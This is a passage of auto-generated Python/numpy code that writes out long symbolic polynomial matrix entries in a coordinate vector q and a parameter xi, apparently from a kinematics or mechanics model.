0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 84279.8353909465*(2*q[3, 0] - q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 355.555555555555*(2*q[3, 0] - q[4, 0] - q[5, 0])**2 + 1) + (12828156665.2727*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 405890894.487145*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 7990976.98521566*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 84279.8353909465*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 355.555555555555*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0]))*(-38484469995.8182*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 1217672683.46143*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 23972930.955647*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 252839.506172839*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 1066.66666666667*(q[1, 0] - q[2, 0])**2 + 1))*(-160351958.315909*xi**10*(2*q[6, 0] - q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**4 + 5073636.18108931*xi**8*(2*q[6, 0] - q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**3 - 99887.2123151958*xi**6*(2*q[6, 0] - q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**2 + 1053.49794238683*xi**4*(2*q[6, 0] - q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2) - 4.44444444444444*xi**2*(2*q[6, 0] - q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)) + ((-4810558749.47727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 121767268.346143*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 1797969.82167352*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 12641.975308642*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 26.6666666666667*numpy.sqrt(3)*(q[1, 0] - q[2, 0]))*(-51312626661.0909*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**5 + 1623563577.94858*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 31963907.9408627*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 337119.341563786*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 1422.22222222222*q[3, 0]**2 + 1422.22222222222*q[3, 0]*q[4, 0] + 1422.22222222222*q[3, 0]*q[5, 0] - 1422.22222222222*q[4, 0]**2 + 1422.22222222222*q[4, 0]*q[5, 0] - 1422.22222222222*q[5, 0]**2 + 1) + (-4810558749.47727*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 121767268.346143*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 1797969.82167352*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 12641.975308642*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 26.6666666666667*numpy.sqrt(3)*(q[4, 0] - q[5, 0]))*(-38484469995.8182*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 1217672683.46143*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 23972930.955647*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 252839.506172839*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 1066.66666666667*(q[1, 0] - q[2, 0])**2 + 1) + (12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 355.555555555555*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0]))*(-2405279374.73864*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 898984.910836762*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 6320.98765432099*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) + 30441817.0865359*(8*q[3, 0] - 4*q[4, 0] - 4*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 53.3333333333333*q[3, 0] + 26.6666666666667*q[4, 0] + 26.6666666666667*q[5, 0]))*(60131984.3684659*xi**9*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**4 - 1522090.85432679*xi**7*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**3 + 22474.6227709191*xi**5*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**2 - 79.0123456790123*xi**3*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(2*q[6, 0]**2 - 2*q[6, 0]*q[7, 0] - 2*q[6, 0]*q[8, 0] + 2*q[7, 0]**2 - 2*q[7, 0]*q[8, 0] + 2*q[8, 0]**2) + (1/3)*xi*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)) + 1053.49794238683*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + (-4810558749.47727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 121767268.346143*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 1797969.82167352*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 12641.975308642*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 26.6666666666667*numpy.sqrt(3)*(q[1, 0] - q[2, 0]))*(60131984.3684659*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 1522090.85432679*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 22474.6227709191*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 79.0123456790123*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(2*q[3, 0]**2 - 2*q[3, 0]*q[4, 0] - 2*q[3, 0]*q[5, 0] + 2*q[4, 0]**2 - 2*q[4, 0]*q[5, 0] + 2*q[5, 0]**2) + (1/3)*q[3, 0] + (1/3)*q[4, 0] + (1/3)*q[5, 0] + 0.15) + (-160351958.315909*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*(12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 355.555555555555*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])) + (-160351958.315909*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 4.44444444444444*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) + 1053.49794238683*numpy.sqrt(3)*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2))*(-38484469995.8182*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 1217672683.46143*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 23972930.955647*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 252839.506172839*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 1066.66666666667*(q[1, 0] - q[2, 0])**2 + 1)],
[((4810558749.47727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 121767268.346143*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 1797969.82167352*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 12641.975308642*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 26.6666666666667*numpy.sqrt(3)*(q[1, 0] - q[2, 0]))*(-4810558749.47727*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 121767268.346143*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 1797969.82167352*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 12641.975308642*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 26.6666666666667*numpy.sqrt(3)*(q[4, 0] - q[5, 0])) + (2405279374.73864*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 898984.910836762*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 6320.98765432099*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 30441817.0865359*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 53.3333333333333*q[0, 0] - 26.6666666666667*q[1, 0] - 26.6666666666667*q[2, 0])*(-2405279374.73864*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 898984.910836762*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 6320.98765432099*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) + 30441817.0865359*(8*q[3, 0] - 4*q[4, 0] - 4*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 53.3333333333333*q[3, 0] + 26.6666666666667*q[4, 0] + 26.6666666666667*q[5, 0]) + (-51312626661.0909*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**5 + 1623563577.94858*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 31963907.9408627*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 337119.341563786*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 1422.22222222222*q[0, 0]**2 + 1422.22222222222*q[0, 0]*q[1, 0] + 1422.22222222222*q[0, 0]*q[2, 0] - 1422.22222222222*q[1, 0]**2 + 1422.22222222222*q[1, 0]*q[2, 0] - 1422.22222222222*q[2, 0]**2 + 1)*(-51312626661.0909*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**5 + 1623563577.94858*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 31963907.9408627*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 337119.341563786*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 1422.22222222222*q[3, 0]**2 + 1422.22222222222*q[3, 0]*q[4, 0] + 1422.22222222222*q[3, 0]*q[5, 0] - 1422.22222222222*q[4, 0]**2 + 1422.22222222222*q[4, 0]*q[5, 0] - 1422.22222222222*q[5, 0]**2 + 1))*(60131984.3684659*xi**9*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**4 - 1522090.85432679*xi**7*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**3 + 22474.6227709191*xi**5*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**2 - 79.0123456790123*xi**3*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(2*q[6, 0]**2 - 2*q[6, 0]*q[7, 0] - 2*q[6, 0]*q[8, 0] + 2*q[7, 0]**2 - 2*q[7, 0]*q[8, 0] + 2*q[8, 0]**2) + (1/3)*xi*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)) + ((4810558749.47727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 121767268.346143*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 1797969.82167352*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 12641.975308642*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 26.6666666666667*numpy.sqrt(3)*(q[1, 0] - q[2, 0]))*(12828156665.2727*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 405890894.487145*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 7990976.98521566*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 84279.8353909465*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 355.555555555555*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])) + (-12828156665.2727*(2*q[3, 0] - q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 2004399.47894886*(2*q[3, 0] - q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 7990976.98521566*(2*q[3, 0] - q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 84279.8353909465*(2*q[3, 0] - q[4, 0] - 